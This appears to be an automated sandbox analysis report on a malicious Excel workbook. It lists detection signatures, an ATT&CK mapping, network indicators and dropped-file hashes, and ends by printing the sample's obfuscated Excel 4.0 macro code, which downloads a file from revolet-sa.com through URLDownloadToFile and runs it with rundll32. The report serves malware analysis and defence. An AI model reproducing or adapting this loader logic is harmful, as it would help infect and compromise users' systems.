Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Heur.19090.20815
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for dropped file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | Virustotal | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
22% | Virustotal | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
9% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382978 |
Start date: | 07.04.2021 |
Start time: | 00:39:14 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Heur.19090.20815 (renamed file extension from 20815 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
00:39:40 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
192.232.249.186 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
revolet-sa.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbx | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
C:\Users\user\sdbybsd.fds | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67964 |
Entropy (8bit): | 7.87953531390611 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70Zk:LqeRrW2JyW32AiHD2sTU2yF70y |
MD5: | 18D5800BB59D4CDB25D50DF1316B2465 |
SHA1: | 370473B1DF913CE700D9281625282065CC1811EF |
SHA-256: | C73CE424938392370B843621F6260DD20119098D198D0A7608F796EAF246B121 |
SHA-512: | 4984A164DD52680E68B31710C58210222276FA51FA0CB06C50AA17B96AA1849333E856B2BF758BB9927CC13C5DD78CC88ABB4D72B234F3C2F9A7836BDC0B0886 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.031603060981824 |
Encrypted: | false |
SSDEEP: | 48:Kb6U3Xt56fOgWh3c5U3Xl5MSib6U3XH6LHf+6snQvOFZ3XvQKFPF:Kb6AZmq5MFb6We2pMKFPF |
MD5: | 4F8F4D65E7D67B271524E3DDDF2E812D |
SHA1: | AD59D32FF2EFB8083B6138E94184037D18902875 |
SHA-256: | 3310FAB31AF8268161DD1C84DCFB897A747AF01B3B351DB3FE6F13FBD0DEDBA3 |
SHA-512: | 96D98809AA404831495BB278F7F6FD64163BC4DD4C28CD906C9B3583080A7AD909D7AC3ECE9F577C339792945758EE4307032701D61EF5B847B859A5DBA0A56C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.4753143676981315 |
Encrypted: | false |
SSDEEP: | 12:85QxiHcLgXg/XAlCPCHaXgzB8IB/GUMX+WnicvbK+bDtZ3YilMMEpxRljK/bTdJU:85JK/XTwz6IoYezDv3qY/rNru/ |
MD5: | 8D3B7D68629D3D2CF685B79FF61C8368 |
SHA1: | 5C1F0FDC2071992D3D0A0EE1D22F60002B98CFC1 |
SHA-256: | 66C71CA5FBC4919861E4B3059A566C04360B11F27136D4D7C79F1D7838E1CBF4 |
SHA-512: | D03C48E111D8470A14CFF5CFA66A0F3DBD8FBBFFEFF90623BC6232A26AAB98F1AC235BE81129728E9D79053BB64953EE3D9C1BCBEFF64B25E939C658C8329BAA |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.556211471537111 |
Encrypted: | false |
SSDEEP: | 48:8o/XT3IxHhHPCHhHKY/Qh2o/XT3IxHhHPCHhHKY/Q/:8o/XLIxhEKY/Qh2o/XLIxhEKY/Q/ |
MD5: | 56591CE780AB2B22145D6C602187FEBC |
SHA1: | A98E9126AE45B21DA40965DBE505A56E21F794F2 |
SHA-256: | 3F1E7DADA6CF93803F73BA57EE80976A36C7138882DECAE9F8744B98D16A5EC4 |
SHA-512: | F5587DDC5C3C3A42455C121695428581938F360BB0202AB18D7F954510AB3ED6A110916E141D19840EC71F0DC509E75AB4412B0E5ED34604454C5B36C6B9B888 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134 |
Entropy (8bit): | 4.692593666327791 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bIV9CuscbIV9CmM0bIV9Cv:dj60Kl0x |
MD5: | B6FDE063100C2E59B4C1F26331BBF794 |
SHA1: | ACA2DCBB6D739ECCC16A2EFE91727091CDEA3EDD |
SHA-256: | 7E16E199BFD6286940A2F4C04A0C577A8BC09F47808C6A48713BED4EA2D3BE10 |
SHA-512: | 98279B1E55D5DFC45412F292E05AF27502D664A531C95BE47B01623E7B6EDC958FD540D639CD5D05398E58D28AFF8401A3069E101965EF9CD7180A4752CB1E18 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230450160548897 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSZ2jTUqyF70XirW2aUvlhaUvlUI8rmjl:G8rmjAItyzElBIL6lECbgBvP5NmuCSei |
MD5: | F55089B3CE118226D0C691787FDFBFF7 |
SHA1: | 46D6091DD5C0EFB2A98C0C7998FBFF06BF8DFA8D |
SHA-256: | 42917635F3AD79A5896F70AE5C4DE8C796EB820E44C7AB283EAD581FEF9373CB |
SHA-512: | 78B96817D6EFCBD1BC91E70F2F6697A8C6FC9C468B4852B6A8CC5E69870E18902F04A07837C560C53A7F99556502937B9B6F71B65916D91021603A3E114C4B4F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: |
|
File name: | SecuriteInfo.com.Heur.19090.xls |
File size: | 267776 |
MD5: | daf2b1b562a007a93fbe00dee3ec93d3 |
SHA1: | eed18fda9a83a4d6bdc1d65ea29c6dc62dddaf5f |
SHA256: | ac5eb1618543365bfdbd27633949fc179424317db799d2ca55e39f0ef88fff44 |
SHA512: | 65dddd98085bb38798b93ba896cf4a821d509c073bdd9133c13b6a10210026e1237c6bf799521476304b2cf0f7249c97535863a0d5f56408c935a4922807b959 |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0u:Fhu |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Heur.19090.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247521269318 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=